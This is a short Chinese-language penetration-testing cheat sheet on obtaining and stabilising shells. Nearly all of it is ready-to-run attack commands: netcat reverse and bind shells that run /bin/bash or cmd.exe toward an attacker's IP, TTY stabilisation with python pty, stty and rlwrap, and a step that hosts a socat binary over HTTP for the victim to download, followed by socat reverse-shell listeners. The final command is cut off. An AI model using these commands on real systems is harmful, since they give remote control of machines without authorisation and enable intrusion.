shell获取
netcat
反向shell
攻击机执行
sudo nc -lvnp 443
被害机执行
nc <IP> <PORT> -e /bin/bash
绑定shell
攻击机执行
nc MACHINE_IP <PORT>
被害机执行
nc -lvnp <PORT> -e "cmd.exe"
稳定shell
python
#备注
1、此方法特别适合linux
2、如果shell死机请键入 `reset`并按 Enter 键,恢复中断输出
#执行
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
ctrl + Z
stty raw -echo; fg
rlwrap
# 备注
此方法对于windows特别有用
#安装
sudo apt install rlwrap
#Windows执行
rlwrap nc -lvnp <PORT>
#Linux执行
rlwrap nc -lvnp <PORT>
Ctrl + Z
stty raw -echo; fg
socat
#备注
此方法对于linux有效,对于windows效果甚微
#二进制下载
https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true
# 下载到受害机
sudo python3 -m http.server 80
wget <LOCAL-IP>/socat -O /tmp/socat
# 运行详见socat标题
socat
建立反向shell
攻击机运行
socat TCP-L:<port> -
受害机运行
#windows
socat TCP:<LOCAL-IP>:&